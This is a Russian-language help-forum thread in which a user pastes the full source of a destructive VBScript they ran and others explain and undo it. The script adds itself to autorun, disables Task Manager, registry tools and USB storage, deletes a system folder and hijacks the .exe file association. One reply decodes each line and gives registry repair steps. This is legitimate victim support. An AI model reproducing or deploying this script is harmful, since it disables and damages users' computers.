Другие языки программирования и технологии

Помогите, открыл .vbs файл и у меня теперь не открываються программы, любые! код внутри.

on error resume next Set S = CreateObject("Wscript.Shell") set FSO=createobject("scripting.filesystemobject") fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(0)+"\s ys32dll.vbs" s.regwrite"HKLM\Software\Microsoft\Windows\Current Version\Run\Explorer32",fso.GetSpecialFolder(0)+"\ sys32dll.vbs" s.regwrite"HKCU\Software\Policies\Microsoft\Intern et Explorer\Restrictions\NoSelectDownloadDir","1","RE G_DWORD" fso.deletefolder fso.getspecialfolder(0)+"\system32\drives",1 s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\System\disabletaskmgr","1","REG_D WORD" s.regwrite"HKCU\Software\Microsoft\Windows\Current Version\Policies\System\disableregistrytools","1", "REG_DWORD" s.regwrite"HKCR\exefile\shell\open\command\","rund ll32.exe" s.regwrite"HKLM\SYSTEM\CurrentControlSet\Services\ USBSTOR\Start","4","REG_DWORD" вот этот код. Как исправить? То что натворилось?
Sergei Prozhoga
Sergei Prozhoga
3 318
Пишу в частности на VBS, потому понимаю, что то ли вы вирус такой словили странный слегка (флешки-то за что и систему так зачем портить...) , то-ли кто-то "пошутил"...

0. Скопирован скрипт в системную папку Windows
1. HKLM\Software\Microsoft\Windows\Current Version\Run\Explorer32",fso.GetSpecialFolder(0)+"\ sys32dll.vbs = Прописан скрипт в автозагрузку.
2.HKCU\Software\Policies\Microsoft\Intern et Explorer\Restrictions\NoSelectDownloadDir = Запрет на выбор папки при скачивании с помощью IE
3. fso.deletefolder fso.getspecialfolder(0)+"\system32\drives" = Удаляется папка drives в %SYSTEM32%
4.HKCU\Software\Microsoft\Windows\Current Version\Policies\System\disabletaskmgr","1", = Отключён диспетчер задач
5. HKCU\Software\Microsoft\Windows\Current Version\Policies\System\disableregistrytools = Отключён редактор реестра
6. HKCR\exefile\shell\open\command = Потеряна связь для запуска .exe (подменена на rundll32)
7. HKLM\SYSTEM\CurrentControlSet\Services\ USBSTOR\Start, 4 = Отключена служба отвечающая за работу USB флешек

P.S: Поздравляю...
Что делать: Возьмите альтернативный редактор реестра (Advanced Regedit - http://sourceforge.net/projects/regedt33/files/regedt33/0.14d/)
В дальнейшем работа с реестром только через него. Если пишу, что удалить ключ - значит удалять через него. Сохраните .exe файл в C:\
Запускать редактор будете Пуск->Выполнить C:\имя_этого_редактора_реестра. exe

0. Зайти в папку Windows, удалить файл sys32dll.vbs
1. Удалить ключ вместе с значением HKLM\Software\Microsoft\Windows\Current Version\Run\Explorer32
2. Удалить ключ вместо с значением HKCU\Software\Policies\Microsoft\Intern et Explorer\Restrictions\NoSelectDownloadDir или задать ему 0
3. Если Drives - это не опечатка (должно быть Drivers ;) - игнорируйте. Если всё-таки в оригинале Drivers - восстанавливайте удалённые файлы программой Recuva н-р как можно скорее. Иначе потом всё плохо будет.
4. Удалить ключ вместо со значением HKCU\Software\Microsoft\Windows\Current Version\Policies\System\disabletaskmgr" или задать ему 0
5. Удалить ключ вместо со значением HKCU\Software\Microsoft\Windows\Current Version\Policies\System\disableregistrytools или задать ему 0
6. Зайдите в ключ HKCR\exefile\shell\open\command в Default впишите "%1" %* - Внимательно только!
7. Зайдите HKLM\SYSTEM\CurrentControlSet\Services\ USBSTOR\Start, установите значение 3 вместо 4
ВБ
Владислав Будаев
84 764
Лучший ответ
Sergei Prozhoga блин, что делать? Есть ли лекарство? Я могу его принять, допустим через файло обменник.
надо исправить днк
ага
помню как боролись с подобной фигней
.exe не запустит, но его можно переименовать в .com
попробовать можно =)
Дмитрий Сычев
Дмитрий Сычев
17 228

Похожие вопросы